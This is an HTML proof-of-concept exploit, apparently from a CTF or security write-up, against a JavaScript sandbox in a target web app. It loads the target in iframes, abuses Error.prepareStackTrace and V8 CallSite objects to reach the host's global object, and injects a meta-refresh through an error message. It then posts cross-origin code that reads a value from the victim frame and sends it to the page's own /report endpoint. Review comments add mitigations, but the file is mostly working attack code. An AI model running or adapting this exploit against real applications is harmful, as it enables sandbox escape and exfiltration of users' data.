exp.html
<iframe id="orig"></iframe>
<iframe id="f"></iframe>
<script>
// Promise-based delay: resolves (with no value) once `ms` milliseconds have elapsed.
// The page uses it as a fixed wait between steps instead of listening for load events.
const sleep = (ms) =>
  new Promise((done) => {
    setTimeout(done, ms);
  });
// Proof-of-concept driver for a sandbox-escape write-up. It loads the target
// application in the two iframes declared above, hands it one code snippet via
// the `?code=` query parameter and a second one via postMessage, and expects
// the result to arrive at this page's own `/report` endpoint.
//
// NOTE(review): the target application is not part of this file. Every
// statement below about how the target treats `code`, 'error' messages or
// 'init' messages is inferred from what this page sends — confirm against the
// target's source.
//
// Both snippets are plain strings here; nothing inside the backticks executes
// in this page. They share one technique: the guest code recovers the realm's
// real `Error` constructor from a thrown TypeError, installs
// `Error.prepareStackTrace` so that `e.stack` becomes the raw array of V8
// CallSite objects, and then uses `getFunction().arguments[0].target` on a
// host frame to obtain the object the host handler was dispatched on.
//
// Defensive reading: a sandbox that shares a call stack with privileged code
// and lets guest code set `Error.prepareStackTrace` exposes host functions and
// their arguments. V8 returns undefined from CallSite#getFunction() for
// strict-mode frames, so strict-mode host code is one barrier; running guest
// code in a context with no privileged frames on its stack is the stronger one.
;(async () => {
// Origin of the page serving this file; the second snippet sends its result to `${base}/report`.
const base = `${location.protocol}//${location.host}`
// Target origin is taken from `?target=`; falls back to a local instance when the parameter is absent.
const target = new URLSearchParams(location.search).get('target') ?? 'http://localhost:8763'
// `orig` and `f` resolve to the iframes above through the browser's id-named globals.
// The first frame simply loads the target unmodified.
orig.src = target
// Fixed wait rather than a load event — presumably to let the first frame finish loading (timing-dependent).
await sleep(500)
// First snippet, URL-encoded into `?code=` of the second frame.
// After obtaining `g` (see header), it builds an HTML Blob through `g.Blob` /
// `g.URL.createObjectURL` — i.e. with the target's own constructors — whose markup
// loads `${target}/worker.js` as a classic script, then posts a
// { type: 'error', content } message whose content embeds a
// `<meta http-equiv="refresh">` pointing at that blob: URL.
// NOTE(review): the meta tag can only take effect if the receiver inserts
// `content` into the DOM as HTML — presumably it does. Rendering error text
// with `textContent` (or escaping it) would neutralise this step.
// `<\/script>` is escaped only so the HTML parser does not end this <script> block early.
f.src =
target +
'/?code=' +
encodeURIComponent(`
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Error = TypeError.prototype.__proto__.constructor
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
try{
null.f()
}catch(e){
g=e.stack[2]?.getFunction().arguments[0].target
const blob = new g.Blob(['<h1>peko</h1><script src="${target}/worker.js"><\/script>'], {type: 'text/html'})
const url = g.URL.createObjectURL(blob)
g.postMessage({ type: 'error', content: 'hello' + '<meta http-equiv="refresh" content="0; url='+url+'">' })
}
`)
// Second fixed wait — presumably for the first snippet to run and the frame to be redirected.
await sleep(2000)
console.log('posting')
// The message includes an OffscreenCanvas, transferred (not copied) via the transfer list below.
// NOTE(review): presumably the receiver's 'init' handler expects a canvas — confirm.
const canvas = document.createElement('canvas').transferControlToOffscreen()
// Second snippet, delivered from this (cross-origin) parent page with targetOrigin '*'.
// NOTE(review): for this to be accepted the receiving message handler must not
// be checking `event.origin` / `event.source`; adding that check is the
// corresponding mitigation.
f.contentWindow.postMessage(
{
// Message shape: { type, code, canvas }.
// The snippet repeats the stack-trace technique, then navigates `g` to
// `${base}/report?result=...`, where the result is whatever the identifier
// `fallback` evaluates to inside `g.top[0]` — the first child frame of the
// top window, which on this page is the `orig` iframe.
// What `fallback` holds in the target is not shown here.
// `JSON.stringify(base)` embeds the base URL as a quoted string literal in the snippet.
type: 'init',
code: `
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Error = TypeError.prototype.__proto__.constructor
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
try{
null.f()
}catch(e){
const g = e.stack[2].getFunction().arguments[0].target
g.location = ${JSON.stringify(base)} + '/report?result=' + g.encodeURIComponent(g.top[0].eval('fallback'))
}
`,
canvas
},
'*',
[canvas]
)
})()
</script>